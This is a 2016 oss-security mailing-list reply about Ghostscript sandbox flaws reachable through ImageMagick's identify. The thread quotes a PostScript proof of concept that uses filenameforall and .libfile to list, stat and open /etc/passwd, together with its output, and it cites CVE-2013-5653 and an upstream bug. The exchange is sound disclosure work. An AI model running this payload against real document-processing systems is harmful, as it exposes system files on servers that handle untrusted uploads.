Date: Thu, 29 Sep 2016 05:02:19 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: ImageMagick identify "d:" hangs

On Wed, Sep 28, 2016 at 11:25 PM, Florian Weimer <fw@...eb.enyo.de> wrote:
>
> * Tavis Ormandy:
>
> > Here is the code I'm testing with (Note: I really don't know much
> > postscript - and I hate it).
> >
> > $ cat test.ps
> > /dumpname {
> >     dup             % copy filename
> >     dup             % copy filename
> >     print           % print filename
> >     (\n) print      % print newline
> >     status          % stat filename
> >     {
> >         (stat succeeded\n) print
> >         ( ctime:) print
> >         64 string cvs print
> >         ( atime:) print
> >         64 string cvs print
> >         ( size:) print
> >         64 string cvs print
> >         ( blocks:) print
> >         64 string cvs print
> >         (\n) print
> >         (\n) print
> >     }{
> >         (unable to stat\n\n) print
> >     } ifelse
> >     .libfile        % open as library
> >     {
> >         (.libfile returned file\n\n) print
> >         64 string readstring
> >     pop         % discard result (should probably test)
> >         print
> >         (\n) print
> >     }{
> >         (.libfile returned string\n) print
> >         print
> >         (\n) print
> >     } ifelse
> > } def
> >
> > (/etc/pass*) /dumpname load 256 string filenameforall
>
> filenameforall was fixed as part of this:
>
>   http://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=ab109aaeb3ddba59518b036fb288402a65cf7ce8
>   http://bugs.ghostscript.com/show_bug.cgi?id=694724
>
> This also covers getenv and has already been assigned CVE-2013-5653.

Thanks Florian, that explains it, although the distros do not appear
to have picked that patch up.

>
> > $ identify test.ps
> > /etc/passwd
> > stat succeeded
> >  ctime:1474998792 atime:1474998792 size:2662 blocks:8
> >
> > .libfile returned file
>
> .libfile is not yet fixed upstream.  I reported this upstream:
>
>   http://bugs.ghostscript.com/show_bug.cgi?id=697169

Thanks - seems like bad news for any automated image/document processing.

Tavis.
